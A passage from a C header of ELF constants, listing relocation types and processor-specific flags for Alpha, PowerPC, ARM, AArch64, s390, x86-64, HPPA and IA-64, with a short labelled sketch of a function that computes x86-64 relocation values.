to GP */ #define R_ALPHA_BRADDR 7 /* PC+4 relative 23 bit shifted */ #define R_ALPHA_HINT 8 /* PC+4 relative 16 bit shifted */ #define R_ALPHA_SREL16 9 /* PC relative 16 bit */ #define R_ALPHA_SREL32 10 /* PC relative 32 bit */ #define R_ALPHA_SREL64 11 /* PC relative 64 bit */ #define R_ALPHA_GPRELHIGH 17 /* GP relative 32 bit, high 16 bits */ #define R_ALPHA_GPRELLOW 18 /* GP relative 32 bit, low 16 bits */ #define R_ALPHA_GPREL16 19 /* GP relative 16 bit */ #define R_ALPHA_COPY 24 /* Copy symbol at runtime */ #define R_ALPHA_GLOB_DAT 25 /* Create GOT entry */ #define R_ALPHA_JMP_SLOT 26 /* Create PLT entry */ #define R_ALPHA_RELATIVE 27 /* Adjust by program base */ #define R_ALPHA_BRSGP 28 #define R_ALPHA_TLSGD 29 #define R_ALPHA_TLS_LDM 30 #define R_ALPHA_DTPMOD64 31 #define R_ALPHA_GOTDTPREL 32 #define R_ALPHA_DTPREL64 33 #define R_ALPHA_DTPRELHI 34 #define R_ALPHA_DTPRELLO 35 #define R_ALPHA_DTPREL16 36 #define R_ALPHA_GOTTPREL 37 #define R_ALPHA_TPREL64 38 #define R_ALPHA_TPRELHI 39 #define R_ALPHA_TPRELLO 40 #define R_ALPHA_TPREL16 41 #define SHF_ALPHA_GPREL 0x10000000 /* PowerPC specific definitions. */ /* Processor specific flags for the ELF header e_flags field. */ #define EF_PPC64_ABI 0x3 /* PowerPC relocations defined by the ABIs */ #define R_PPC_NONE 0 #define R_PPC_ADDR32 1 /* 32bit absolute address */ #define R_PPC_ADDR24 2 /* 26bit address, 2 bits ignored. 
*/ #define R_PPC_ADDR16 3 /* 16bit absolute address */ #define R_PPC_ADDR16_LO 4 /* lower 16bit of absolute address */ #define R_PPC_ADDR16_HI 5 /* high 16bit of absolute address */ #define R_PPC_ADDR16_HA 6 /* adjusted high 16bit */ #define R_PPC_ADDR14 7 /* 16bit address, 2 bits ignored */ #define R_PPC_ADDR14_BRTAKEN 8 #define R_PPC_ADDR14_BRNTAKEN 9 #define R_PPC_REL24 10 /* PC relative 26 bit */ #define R_PPC_REL14 11 /* PC relative 16 bit */ #define R_PPC_REL14_BRTAKEN 12 #define R_PPC_REL14_BRNTAKEN 13 #define R_PPC_GOT16 14 #define R_PPC_GOT16_LO 15 #define R_PPC_GOT16_HI 16 #define R_PPC_GOT16_HA 17 #define R_PPC_PLTREL24 18 #define R_PPC_COPY 19 #define R_PPC_GLOB_DAT 20 #define R_PPC_JMP_SLOT 21 #define R_PPC_RELATIVE 22 #define R_PPC_LOCAL24PC 23 #define R_PPC_UADDR32 24 #define R_PPC_UADDR16 25 #define R_PPC_REL32 26 #define R_PPC_PLT32 27 #define R_PPC_PLTREL32 28 #define R_PPC_PLT16_LO 29 #define R_PPC_PLT16_HI 30 #define R_PPC_PLT16_HA 31 #define R_PPC_SDAREL16 32 #define R_PPC_SECTOFF 33 #define R_PPC_SECTOFF_LO 34 #define R_PPC_SECTOFF_HI 35 #define R_PPC_SECTOFF_HA 36 /* Keep this the last entry. */ #ifndef R_PPC_NUM #define R_PPC_NUM 37 #endif /* ARM specific declarations */ /* Processor specific flags for the ELF header e_flags field. */ #define EF_ARM_RELEXEC 0x01 #define EF_ARM_HASENTRY 0x02 #define EF_ARM_INTERWORK 0x04 #define EF_ARM_APCS_26 0x08 #define EF_ARM_APCS_FLOAT 0x10 #define EF_ARM_PIC 0x20 #define EF_ALIGN8 0x40 /* 8-bit structure alignment is in use */ #define EF_NEW_ABI 0x80 #define EF_OLD_ABI 0x100 #define EF_ARM_SOFT_FLOAT 0x200 #define EF_ARM_VFP_FLOAT 0x400 #define EF_ARM_MAVERICK_FLOAT 0x800 /* Other constants defined in the ARM ELF spec. version B-01. */ #define EF_ARM_SYMSARESORTED 0x04 /* NB conflicts with EF_INTERWORK */ #define EF_ARM_DYNSYMSUSESEGIDX 0x08 /* NB conflicts with EF_APCS26 */ #define EF_ARM_MAPSYMSFIRST 0x10 /* NB conflicts with EF_APCS_FLOAT */ #define EF_ARM_EABIMASK 0xFF000000 /* Constants defined in AAELF. */ #define EF_ARM_BE8 0x00800000 #define EF_ARM_LE8 0x00400000 #define EF_ARM_EABI_VERSION(flags) ((flags) & EF_ARM_EABIMASK) #define EF_ARM_EABI_UNKNOWN 0x00000000 #define EF_ARM_EABI_VER1 0x01000000 #define EF_ARM_EABI_VER2 0x02000000 #define EF_ARM_EABI_VER3 0x03000000 #define EF_ARM_EABI_VER4 0x04000000 #define EF_ARM_EABI_VER5 0x05000000 /* Additional symbol types for Thumb */ #define STT_ARM_TFUNC 0xd /* ARM-specific values for sh_flags */ #define SHF_ARM_ENTRYSECT 0x10000000 /* Section contains an entry point */ #define SHF_ARM_COMDEF 0x80000000 /* Section may be multiply defined in the input to a link step */ /* ARM-specific program header flags */ #define PF_ARM_SB 0x10000000 /* Segment contains the location addressed by the static base */ /* ARM relocs. 
*/ #define R_ARM_NONE 0 /* No reloc */ #define R_ARM_PC24 1 /* PC relative 26 bit branch */ #define R_ARM_ABS32 2 /* Direct 32 bit */ #define R_ARM_REL32 3 /* PC relative 32 bit */ #define R_ARM_PC13 4 #define R_ARM_ABS16 5 /* Direct 16 bit */ #define R_ARM_ABS12 6 /* Direct 12 bit */ #define R_ARM_THM_ABS5 7 #define R_ARM_ABS8 8 /* Direct 8 bit */ #define R_ARM_SBREL32 9 #define R_ARM_THM_PC22 10 #define R_ARM_THM_PC8 11 #define R_ARM_AMP_VCALL9 12 #define R_ARM_SWI24 13 #define R_ARM_THM_SWI8 14 #define R_ARM_XPC25 15 #define R_ARM_THM_XPC22 16 #define R_ARM_COPY 20 /* Copy symbol at runtime */ #define R_ARM_GLOB_DAT 21 /* Create GOT entry */ #define R_ARM_JUMP_SLOT 22 /* Create PLT entry */ #define R_ARM_RELATIVE 23 /* Adjust by program base */ #define R_ARM_GOTOFF 24 /* 32 bit offset to GOT */ #define R_ARM_GOTPC 25 /* 32 bit PC relative offset to GOT */ #define R_ARM_GOT32 26 /* 32 bit GOT entry */ #define R_ARM_PLT32 27 /* 32 bit PLT address */ #define R_ARM_CALL 28 #define R_ARM_JUMP24 29 #define R_ARM_GNU_VTENTRY 100 #define R_ARM_GNU_VTINHERIT 101 #define R_ARM_THM_PC11 102 /* thumb unconditional branch */ #define R_ARM_THM_PC9 103 /* thumb conditional branch */ #define R_ARM_RXPC25 249 #define R_ARM_RSBREL32 250 #define R_ARM_THM_RPC22 251 #define R_ARM_RREL32 252 #define R_ARM_RABS22 253 #define R_ARM_RPC24 254 #define R_ARM_RBASE 255 /* Keep this the last entry. */ #define R_ARM_NUM 256 /* ARM Aarch64 relocation types */ #define R_AARCH64_NONE 256 /* also accepts R_ARM_NONE (0) */ /* static data relocations */ #define R_AARCH64_ABS64 257 #define R_AARCH64_ABS32 258 #define R_AARCH64_ABS16 259 #define R_AARCH64_PREL64 260 #define R_AARCH64_PREL32 261 #define R_AARCH64_PREL16 262 /* static aarch64 group relocations */ /* group relocs to create unsigned data value or address inline */ #define R_AARCH64_MOVW_UABS_G0 263 #define R_AARCH64_MOVW_UABS_G0_NC 264 #define R_AARCH64_MOVW_UABS_G1 265 #define R_AARCH64_MOVW_UABS_G1_NC 266 #define R_AARCH64_MOVW_UABS_G2 267 #define R_AARCH64_MOVW_UABS_G2_NC 268 #define R_AARCH64_MOVW_UABS_G3 269 /* group relocs to create signed data or offset value inline */ #define R_AARCH64_MOVW_SABS_G0 270 #define R_AARCH64_MOVW_SABS_G1 271 #define R_AARCH64_MOVW_SABS_G2 272 /* relocs to generate 19, 21, and 33 bit PC-relative addresses */ #define R_AARCH64_LD_PREL_LO19 273 #define R_AARCH64_ADR_PREL_LO21 274 #define R_AARCH64_ADR_PREL_PG_HI21 275 #define R_AARCH64_ADR_PREL_PG_HI21_NC 276 #define R_AARCH64_ADD_ABS_LO12_NC 277 #define R_AARCH64_LDST8_ABS_LO12_NC 278 #define R_AARCH64_LDST16_ABS_LO12_NC 284 #define R_AARCH64_LDST32_ABS_LO12_NC 285 #define R_AARCH64_LDST64_ABS_LO12_NC 286 #define R_AARCH64_LDST128_ABS_LO12_NC 299 /* relocs for control-flow - all offsets as multiple of 4 */ #define R_AARCH64_TSTBR14 279 #define R_AARCH64_CONDBR19 280 #define R_AARCH64_JUMP26 282 #define R_AARCH64_CALL26 283 /* group relocs to create pc-relative offset inline */ #define R_AARCH64_MOVW_PREL_G0 287 #define R_AARCH64_MOVW_PREL_G0_NC 288 #define R_AARCH64_MOVW_PREL_G1 289 #define R_AARCH64_MOVW_PREL_G1_NC 290 #define R_AARCH64_MOVW_PREL_G2 291 #define R_AARCH64_MOVW_PREL_G2_NC 292 #define R_AARCH64_MOVW_PREL_G3 293 /* group relocs to create a GOT-relative offset inline */ #define R_AARCH64_MOVW_GOTOFF_G0 300 #define R_AARCH64_MOVW_GOTOFF_G0_NC 301 #define R_AARCH64_MOVW_GOTOFF_G1 302 #define R_AARCH64_MOVW_GOTOFF_G1_NC 303 #define R_AARCH64_MOVW_GOTOFF_G2 304 #define R_AARCH64_MOVW_GOTOFF_G2_NC 305 #define R_AARCH64_MOVW_GOTOFF_G3 306 /* GOT-relative data relocs */ 
#define R_AARCH64_GOTREL64 307 #define R_AARCH64_GOTREL32 308 /* GOT-relative instr relocs */ #define R_AARCH64_GOT_LD_PREL19 309 #define R_AARCH64_LD64_GOTOFF_LO15 310 #define R_AARCH64_ADR_GOT_PAGE 311 #define R_AARCH64_LD64_GOT_LO12_NC 312 #define R_AARCH64_LD64_GOTPAGE_LO15 313 /* General Dynamic TLS relocations */ #define R_AARCH64_TLSGD_ADR_PREL21 512 #define R_AARCH64_TLSGD_ADR_PAGE21 513 #define R_AARCH64_TLSGD_ADD_LO12_NC 514 #define R_AARCH64_TLSGD_MOVW_G1 515 #define R_AARCH64_TLSGD_MOVW_G0_NC 516 /* Local Dynamic TLS relocations */ #define R_AARCH64_TLSLD_ADR_PREL21 517 #define R_AARCH64_TLSLD_ADR_PAGE21 518 #define R_AARCH64_TLSLD_ADD_LO12_NC 519 #define R_AARCH64_TLSLD_MOVW_G1 520 #define R_AARCH64_TLSLD_MOVW_G0_NC 521 #define R_AARCH64_TLSLD_LD_PREL19 522 #define R_AARCH64_TLSLD_MOVW_DTPREL_G2 523 #define R_AARCH64_TLSLD_MOVW_DTPREL_G1 524 #define R_AARCH64_TLSLD_MOVW_DTPREL_G1_NC 525 #define R_AARCH64_TLSLD_MOVW_DTPREL_G0 526 #define R_AARCH64_TLSLD_MOVW_DTPREL_G0_NC 527 #define R_AARCH64_TLSLD_ADD_DTPREL_HI12 528 #define R_AARCH64_TLSLD_ADD_DTPREL_LO12 529 #define R_AARCH64_TLSLD_ADD_DTPREL_LO12_NC 530 #define R_AARCH64_TLSLD_LDST8_DTPREL_LO12 531 #define R_AARCH64_TLSLD_LDST8_DTPREL_LO12_NC 532 #define R_AARCH64_TLSLD_LDST16_DTPREL_LO12 533 #define R_AARCH64_TLSLD_LDST16_DTPREL_LO12_NC 534 #define R_AARCH64_TLSLD_LDST32_DTPREL_LO12 535 #define R_AARCH64_TLSLD_LDST32_DTPREL_LO12_NC 536 #define R_AARCH64_TLSLD_LDST64_DTPREL_LO12 537 #define R_AARCH64_TLSLD_LDST64_DTPREL_LO12_NC 538 /* initial exec TLS relocations */ #define R_AARCH64_TLSIE_MOVW_GOTTPREL_G1 539 #define R_AARCH64_TLSIE_MOVW_GOTTPREL_G0_NC 540 #define R_AARCH64_TLSIE_ADR_GOTTPREL_PAGE21 541 #define R_AARCH64_TLSIE_LD64_GOTTPREL_LO12_NC 542 #define R_AARCH64_TLSIE_LD_GOTTPREL_PREL19 543 /* local exec TLS relocations */ #define R_AARCH64_TLSLE_MOVW_TPREL_G2 544 #define R_AARCH64_TLSLE_MOVW_TPREL_G1 545 #define R_AARCH64_TLSLE_MOVW_TPREL_G1_NC 546 #define R_AARCH64_TLSLE_MOVW_TPREL_G0 547 #define R_AARCH64_TLSLE_MOVW_TPREL_G0_NC 548 #define R_AARCH64_TLSLE_ADD_TPREL_HI12 549 #define R_AARCH64_TLSLE_ADD_TPREL_LO12 550 #define R_AARCH64_TLSLE_ADD_TPREL_LO12_NC 551 #define R_AARCH64_TLSLE_LDST8_TPREL_LO12 552 #define R_AARCH64_TLSLE_LDST8_TPREL_LO12_NC 553 #define R_AARCH64_TLSLE_LDST16_TPREL_LO12 554 #define R_AARCH64_TLSLE_LDST16_TPREL_LO12_NC 555 #define R_AARCH64_TLSLE_LDST32_TPREL_LO12 556 #define R_AARCH64_TLSLE_LDST32_TPREL_LO12_NC 557 #define R_AARCH64_TLSLE_LDST64_TPREL_LO12 558 #define R_AARCH64_TLSLE_LDST64_TPREL_LO12_NC 559 /* Dynamic Relocations */ #define R_AARCH64_COPY 1024 #define R_AARCH64_GLOB_DAT 1025 #define R_AARCH64_JUMP_SLOT 1026 #define R_AARCH64_RELATIVE 1027 #define R_AARCH64_TLS_DTPREL64 1028 #define R_AARCH64_TLS_DTPMOD64 1029 #define R_AARCH64_TLS_TPREL64 1030 #define R_AARCH64_TLS_DTPREL32 1031 #define R_AARCH64_TLS_DTPMOD32 1032 #define R_AARCH64_TLS_TPREL32 1033 /* s390 relocations defined by the ABIs */ #define R_390_NONE 0 /* No reloc. */ #define R_390_8 1 /* Direct 8 bit. */ #define R_390_12 2 /* Direct 12 bit. */ #define R_390_16 3 /* Direct 16 bit. */ #define R_390_32 4 /* Direct 32 bit. */ #define R_390_PC32 5 /* PC relative 32 bit. */ #define R_390_GOT12 6 /* 12 bit GOT offset. */ #define R_390_GOT32 7 /* 32 bit GOT offset. */ #define R_390_PLT32 8 /* 32 bit PC relative PLT address. */ #define R_390_COPY 9 /* Copy symbol at runtime. */ #define R_390_GLOB_DAT 10 /* Create GOT entry. */ #define R_390_JMP_SLOT 11 /* Create PLT entry. 
 */
#define R_390_RELATIVE 12 /* Adjust by program base. */
#define R_390_GOTOFF32 13 /* 32 bit offset to GOT. */
#define R_390_GOTPC 14 /* 32 bit PC rel. offset to GOT. */
#define R_390_GOT16 15 /* 16 bit GOT offset. */
#define R_390_PC16 16 /* PC relative 16 bit. */
#define R_390_PC16DBL 17 /* PC relative 16 bit shifted by 1. */
#define R_390_PLT16DBL 18 /* 16 bit PC rel. PLT shifted by 1. */
#define R_390_PC32DBL 19 /* PC relative 32 bit shifted by 1. */
#define R_390_PLT32DBL 20 /* 32 bit PC rel. PLT shifted by 1. */
#define R_390_GOTPCDBL 21 /* 32 bit PC rel. GOT shifted by 1. */
#define R_390_64 22 /* Direct 64 bit. */
#define R_390_PC64 23 /* PC relative 64 bit. */
#define R_390_GOT64 24 /* 64 bit GOT offset. */
#define R_390_PLT64 25 /* 64 bit PC relative PLT address. */
#define R_390_GOTENT 26 /* 32 bit PC rel. to GOT entry >> 1. */
#define R_390_GOTOFF16 27 /* 16 bit offset to GOT. */
#define R_390_GOTOFF64 28 /* 64 bit offset to GOT. */
#define R_390_GOTPLT12 29 /* 12 bit offset to jump slot. */
#define R_390_GOTPLT16 30 /* 16 bit offset to jump slot. */
#define R_390_GOTPLT32 31 /* 32 bit offset to jump slot. */
#define R_390_GOTPLT64 32 /* 64 bit offset to jump slot. */
#define R_390_GOTPLTENT 33 /* 32 bit rel. offset to jump slot. */
#define R_390_PLTOFF16 34 /* 16 bit offset from GOT to PLT. */
#define R_390_PLTOFF32 35 /* 32 bit offset from GOT to PLT. */
#define R_390_PLTOFF64 36 /* 64 bit offset from GOT to PLT. */
#define R_390_TLS_LOAD 37 /* Tag for load insn in TLS code. */
#define R_390_TLS_GDCALL 38 /* Tag for function call in general dynamic TLS code. */
#define R_390_TLS_LDCALL 39 /* Tag for function call in local dynamic TLS code. */
#define R_390_TLS_GD32 40 /* Direct 32 bit for general dynamic thread local data. */
#define R_390_TLS_GD64 41 /* Direct 64 bit for general dynamic thread local data. */
#define R_390_TLS_GOTIE12 42 /* 12 bit GOT offset for static TLS block offset. */
#define R_390_TLS_GOTIE32 43 /* 32 bit GOT offset for static TLS block offset. */
#define R_390_TLS_GOTIE64 44 /* 64 bit GOT offset for static TLS block offset. */
#define R_390_TLS_LDM32 45 /* Direct 32 bit for local dynamic thread local data in LD code. */
#define R_390_TLS_LDM64 46 /* Direct 64 bit for local dynamic thread local data in LD code. */
#define R_390_TLS_IE32 47 /* 32 bit address of GOT entry for negated static TLS block offset. */
#define R_390_TLS_IE64 48 /* 64 bit address of GOT entry for negated static TLS block offset. */
#define R_390_TLS_IEENT 49 /* 32 bit rel. offset to GOT entry for negated static TLS block offset. */
#define R_390_TLS_LE32 50 /* 32 bit negated offset relative to static TLS block. */
#define R_390_TLS_LE64 51 /* 64 bit negated offset relative to static TLS block. */
#define R_390_TLS_LDO32 52 /* 32 bit offset relative to TLS block. */
#define R_390_TLS_LDO64 53 /* 64 bit offset relative to TLS block. */
#define R_390_TLS_DTPMOD 54 /* ID of module containing symbol. */
#define R_390_TLS_DTPOFF 55 /* Offset in TLS block. */
#define R_390_TLS_TPOFF 56 /* Negated offset in static TLS block. */
#define R_390_20 57
/* Keep this the last entry. */
#define R_390_NUM 58

/* x86-64 relocation types */
#define R_X86_64_NONE 0 /* No reloc */
#define R_X86_64_64 1 /* Direct 64 bit */
#define R_X86_64_PC32 2 /* PC relative 32 bit signed */
#define R_X86_64_GOT32 3 /* 32 bit GOT entry */
#define R_X86_64_PLT32 4 /* 32 bit PLT address */
#define R_X86_64_COPY 5 /* Copy symbol at runtime */
#define R_X86_64_GLOB_DAT 6 /* Create GOT entry */
#define R_X86_64_JUMP_SLOT 7 /* Create PLT entry */
#define R_X86_64_RELATIVE 8 /* Adjust by program base */
#define R_X86_64_GOTPCREL 9 /* 32 bit signed pc relative offset to GOT */
#define R_X86_64_32 10 /* Direct 32 bit zero extended */
#define R_X86_64_32S 11 /* Direct 32 bit sign extended */
#define R_X86_64_16 12 /* Direct 16 bit zero extended */
#define R_X86_64_PC16 13 /* 16 bit sign extended pc relative */
#define R_X86_64_8 14 /* Direct 8 bit sign extended */
#define R_X86_64_PC8 15 /* 8 bit sign extended pc relative */
#define R_X86_64_NUM 16

/* Legal values for e_flags field of Elf64_Ehdr. */
#define EF_ALPHA_32BIT 1 /* All addresses are below 2GB */

/* HPPA specific definitions. */

/* Legal values for e_flags field of Elf32_Ehdr. */
#define EF_PARISC_TRAPNIL 0x00010000 /* Trap nil pointer dereference. */
#define EF_PARISC_EXT 0x00020000 /* Program uses arch. extensions. */
#define EF_PARISC_LSB 0x00040000 /* Program expects little endian. */
#define EF_PARISC_WIDE 0x00080000 /* Program expects wide mode. */
#define EF_PARISC_NO_KABP 0x00100000 /* No kernel assisted branch prediction. */
#define EF_PARISC_LAZYSWAP 0x00400000 /* Allow lazy swapping. */
#define EF_PARISC_ARCH 0x0000ffff /* Architecture version. */

/* Defined values for `e_flags & EF_PARISC_ARCH' are: */
#define EFA_PARISC_1_0 0x020b /* PA-RISC 1.0 big-endian. */
#define EFA_PARISC_1_1 0x0210 /* PA-RISC 1.1 big-endian. */
#define EFA_PARISC_2_0 0x0214 /* PA-RISC 2.0 big-endian. */

/* Additional section indices. */
#define SHN_PARISC_ANSI_COMMON 0xff00 /* Section for tentatively declared symbols in ANSI C. */
#define SHN_PARISC_HUGE_COMMON 0xff01 /* Common blocks in huge model. */

/* Legal values for sh_type field of Elf32_Shdr. */
#define SHT_PARISC_EXT 0x70000000 /* Contains product specific ext. */
#define SHT_PARISC_UNWIND 0x70000001 /* Unwind information. */
#define SHT_PARISC_DOC 0x70000002 /* Debug info for optimized code. */

/* Legal values for sh_flags field of Elf32_Shdr. */
#define SHF_PARISC_SHORT 0x20000000 /* Section with short addressing. */
#define SHF_PARISC_HUGE 0x40000000 /* Section far from gp. */
#define SHF_PARISC_SBP 0x80000000 /* Static branch prediction code. */

/* Legal values for ST_TYPE subfield of st_info (symbol type). */
#define STT_PARISC_MILLICODE 13 /* Millicode function entry point. */
#define STT_HP_OPAQUE (STT_LOOS + 0x1)
#define STT_HP_STUB (STT_LOOS + 0x2)

/* HPPA relocs. */
#define R_PARISC_NONE 0 /* No reloc. */
#define R_PARISC_DIR32 1 /* Direct 32-bit reference. */
#define R_PARISC_DIR21L 2 /* Left 21 bits of eff. address. */
#define R_PARISC_DIR17R 3 /* Right 17 bits of eff. address. */
#define R_PARISC_DIR17F 4 /* 17 bits of eff. address. */
#define R_PARISC_DIR14R 6 /* Right 14 bits of eff. address. */
#define R_PARISC_PCREL32 9 /* 32-bit rel. address. */
#define R_PARISC_PCREL21L 10 /* Left 21 bits of rel. address. */
#define R_PARISC_PCREL17R 11 /* Right 17 bits of rel. address. */
#define R_PARISC_PCREL17F 12 /* 17 bits of rel. address. */
#define R_PARISC_PCREL14R 14 /* Right 14 bits of rel. address. */
#define R_PARISC_DPREL21L 18 /* Left 21 bits of rel. address.
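 */

/*
 * Editor's illustrative sketch -- not part of the original header.
 * A minimal example of how a dynamic loader might apply the most common
 * x86-64 relocation kinds above. The helper name, the "base" and "symval"
 * parameters, and the availability of <stdint.h> are assumptions; real
 * loaders handle many more relocation types than this.
 */
static inline uint64_t x86_64_reloc_value(uint32_t type, uint64_t base,
                                          uint64_t symval, int64_t addend)
{
    switch (type) {
    case R_X86_64_RELATIVE:  /* B + A: rebase against the load address */
        return base + addend;
    case R_X86_64_GLOB_DAT:  /* S: fill a GOT slot with the symbol value */
    case R_X86_64_JUMP_SLOT: /* S: fill a PLT slot with the symbol value */
        return symval;
    case R_X86_64_64:        /* S + A */
        return symval + addend;
    default:                 /* unhandled kinds are left to the caller */
        return 0;
    }
}

/* HPPA relocs, continued: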
*/ #define R_PARISC_DPREL14R 22 /* Right 14 bits of rel. address. */ #define R_PARISC_GPREL21L 26 /* GP-relative, left 21 bits. */ #define R_PARISC_GPREL14R 30 /* GP-relative, right 14 bits. */ #define R_PARISC_LTOFF21L 34 /* LT-relative, left 21 bits. */ #define R_PARISC_LTOFF14R 38 /* LT-relative, right 14 bits. */ #define R_PARISC_SECREL32 41 /* 32 bits section rel. address. */ #define R_PARISC_SEGBASE 48 /* No relocation, set segment base. */ #define R_PARISC_SEGREL32 49 /* 32 bits segment rel. address. */ #define R_PARISC_PLTOFF21L 50 /* PLT rel. address, left 21 bits. */ #define R_PARISC_PLTOFF14R 54 /* PLT rel. address, right 14 bits. */ #define R_PARISC_LTOFF_FPTR32 57 /* 32 bits LT-rel. function pointer. */ #define R_PARISC_LTOFF_FPTR21L 58 /* LT-rel. fct ptr, left 21 bits. */ #define R_PARISC_LTOFF_FPTR14R 62 /* LT-rel. fct ptr, right 14 bits. */ #define R_PARISC_FPTR64 64 /* 64 bits function address. */ #define R_PARISC_PLABEL32 65 /* 32 bits function address. */ #define R_PARISC_PCREL64 72 /* 64 bits PC-rel. address. */ #define R_PARISC_PCREL22F 74 /* 22 bits PC-rel. address. */ #define R_PARISC_PCREL14WR 75 /* PC-rel. address, right 14 bits. */ #define R_PARISC_PCREL14DR 76 /* PC rel. address, right 14 bits. */ #define R_PARISC_PCREL16F 77 /* 16 bits PC-rel. address. */ #define R_PARISC_PCREL16WF 78 /* 16 bits PC-rel. address. */ #define R_PARISC_PCREL16DF 79 /* 16 bits PC-rel. address. */ #define R_PARISC_DIR64 80 /* 64 bits of eff. address. */ #define R_PARISC_DIR14WR 83 /* 14 bits of eff. address. */ #define R_PARISC_DIR14DR 84 /* 14 bits of eff. address. */ #define R_PARISC_DIR16F 85 /* 16 bits of eff. address. */ #define R_PARISC_DIR16WF 86 /* 16 bits of eff. address. */ #define R_PARISC_DIR16DF 87 /* 16 bits of eff. address. */ #define R_PARISC_GPREL64 88 /* 64 bits of GP-rel. address. */ #define R_PARISC_GPREL14WR 91 /* GP-rel. address, right 14 bits. */ #define R_PARISC_GPREL14DR 92 /* GP-rel. address, right 14 bits. */ #define R_PARISC_GPREL16F 93 /* 16 bits GP-rel. address. */ #define R_PARISC_GPREL16WF 94 /* 16 bits GP-rel. address. */ #define R_PARISC_GPREL16DF 95 /* 16 bits GP-rel. address. */ #define R_PARISC_LTOFF64 96 /* 64 bits LT-rel. address. */ #define R_PARISC_LTOFF14WR 99 /* LT-rel. address, right 14 bits. */ #define R_PARISC_LTOFF14DR 100 /* LT-rel. address, right 14 bits. */ #define R_PARISC_LTOFF16F 101 /* 16 bits LT-rel. address. */ #define R_PARISC_LTOFF16WF 102 /* 16 bits LT-rel. address. */ #define R_PARISC_LTOFF16DF 103 /* 16 bits LT-rel. address. */ #define R_PARISC_SECREL64 104 /* 64 bits section rel. address. */ #define R_PARISC_SEGREL64 112 /* 64 bits segment rel. address. */ #define R_PARISC_PLTOFF14WR 115 /* PLT-rel. address, right 14 bits. */ #define R_PARISC_PLTOFF14DR 116 /* PLT-rel. address, right 14 bits. */ #define R_PARISC_PLTOFF16F 117 /* 16 bits LT-rel. address. */ #define R_PARISC_PLTOFF16WF 118 /* 16 bits PLT-rel. address. */ #define R_PARISC_PLTOFF16DF 119 /* 16 bits PLT-rel. address. */ #define R_PARISC_LTOFF_FPTR64 120 /* 64 bits LT-rel. function ptr. */ #define R_PARISC_LTOFF_FPTR14WR 123 /* LT-rel. fct. ptr., right 14 bits. */ #define R_PARISC_LTOFF_FPTR14DR 124 /* LT-rel. fct. ptr., right 14 bits. */ #define R_PARISC_LTOFF_FPTR16F 125 /* 16 bits LT-rel. function ptr. */ #define R_PARISC_LTOFF_FPTR16WF 126 /* 16 bits LT-rel. function ptr. */ #define R_PARISC_LTOFF_FPTR16DF 127 /* 16 bits LT-rel. function ptr. */ #define R_PARISC_LORESERVE 128 #define R_PARISC_COPY 128 /* Copy relocation. 
*/ #define R_PARISC_IPLT 129 /* Dynamic reloc, imported PLT */ #define R_PARISC_EPLT 130 /* Dynamic reloc, exported PLT */ #define R_PARISC_TPREL32 153 /* 32 bits TP-rel. address. */ #define R_PARISC_TPREL21L 154 /* TP-rel. address, left 21 bits. */ #define R_PARISC_TPREL14R 158 /* TP-rel. address, right 14 bits. */ #define R_PARISC_LTOFF_TP21L 162 /* LT-TP-rel. address, left 21 bits. */ #define R_PARISC_LTOFF_TP14R 166 /* LT-TP-rel. address, right 14 bits.*/ #define R_PARISC_LTOFF_TP14F 167 /* 14 bits LT-TP-rel. address. */ #define R_PARISC_TPREL64 216 /* 64 bits TP-rel. address. */ #define R_PARISC_TPREL14WR 219 /* TP-rel. address, right 14 bits. */ #define R_PARISC_TPREL14DR 220 /* TP-rel. address, right 14 bits. */ #define R_PARISC_TPREL16F 221 /* 16 bits TP-rel. address. */ #define R_PARISC_TPREL16WF 222 /* 16 bits TP-rel. address. */ #define R_PARISC_TPREL16DF 223 /* 16 bits TP-rel. address. */ #define R_PARISC_LTOFF_TP64 224 /* 64 bits LT-TP-rel. address. */ #define R_PARISC_LTOFF_TP14WR 227 /* LT-TP-rel. address, right 14 bits.*/ #define R_PARISC_LTOFF_TP14DR 228 /* LT-TP-rel. address, right 14 bits.*/ #define R_PARISC_LTOFF_TP16F 229 /* 16 bits LT-TP-rel. address. */ #define R_PARISC_LTOFF_TP16WF 230 /* 16 bits LT-TP-rel. address. */ #define R_PARISC_LTOFF_TP16DF 231 /* 16 bits LT-TP-rel. address. */ #define R_PARISC_HIRESERVE 255 /* Legal values for p_type field of Elf32_Phdr/Elf64_Phdr. */ #define PT_HP_TLS (PT_LOOS + 0x0) #define PT_HP_CORE_NONE (PT_LOOS + 0x1) #define PT_HP_CORE_VERSION (PT_LOOS + 0x2) #define PT_HP_CORE_KERNEL (PT_LOOS + 0x3) #define PT_HP_CORE_COMM (PT_LOOS + 0x4) #define PT_HP_CORE_PROC (PT_LOOS + 0x5) #define PT_HP_CORE_LOADABLE (PT_LOOS + 0x6) #define PT_HP_CORE_STACK (PT_LOOS + 0x7) #define PT_HP_CORE_SHM (PT_LOOS + 0x8) #define PT_HP_CORE_MMF (PT_LOOS + 0x9) #define PT_HP_PARALLEL (PT_LOOS + 0x10) #define PT_HP_FASTBIND (PT_LOOS + 0x11) #define PT_HP_OPT_ANNOT (PT_LOOS + 0x12) #define PT_HP_HSL_ANNOT (PT_LOOS + 0x13) #define PT_HP_STACK (PT_LOOS + 0x14) #define PT_PARISC_ARCHEXT 0x70000000 #define PT_PARISC_UNWIND 0x70000001 /* Legal values for p_flags field of Elf32_Phdr/Elf64_Phdr. */ #define PF_PARISC_SBP 0x08000000 #define PF_HP_PAGE_SIZE 0x00100000 #define PF_HP_FAR_SHARED 0x00200000 #define PF_HP_NEAR_SHARED 0x00400000 #define PF_HP_CODE 0x01000000 #define PF_HP_MODIFY 0x02000000 #define PF_HP_LAZYSWAP 0x04000000 #define PF_HP_SBP 0x08000000 /* IA-64 specific declarations. */ /* Processor specific flags for the Ehdr e_flags field. */ #define EF_IA_64_MASKOS 0x0000000f /* os-specific flags */ #define EF_IA_64_ABI64 0x00000010 /* 64-bit ABI */ #define EF_IA_64_ARCH 0xff000000 /* arch. version mask */ /* Processor specific values for the Phdr p_type field. */ #define PT_IA_64_ARCHEXT (PT_LOPROC + 0) /* arch extension bits */ #define PT_IA_64_UNWIND (PT_LOPROC + 1) /* ia64 unwind bits */ /* Processor specific flags for the Phdr p_flags field. */ #define PF_IA_64_NORECOV 0x80000000 /* spec insns w/o recovery */ /* Processor specific values for the Shdr sh_type field. */ #define SHT_IA_64_EXT (SHT_LOPROC + 0) /* extension bits */ #define SHT_IA_64_UNWIND (SHT_LOPROC + 1) /* unwind bits */ /* Processor specific flags for the Shdr sh_flags field. */ #define SHF_IA_64_SHORT 0x10000000 /* section near gp */ #define SHF_IA_64_NORECOV 0x20000000 /* spec insns w/o recovery */ /* Processor specific values for the 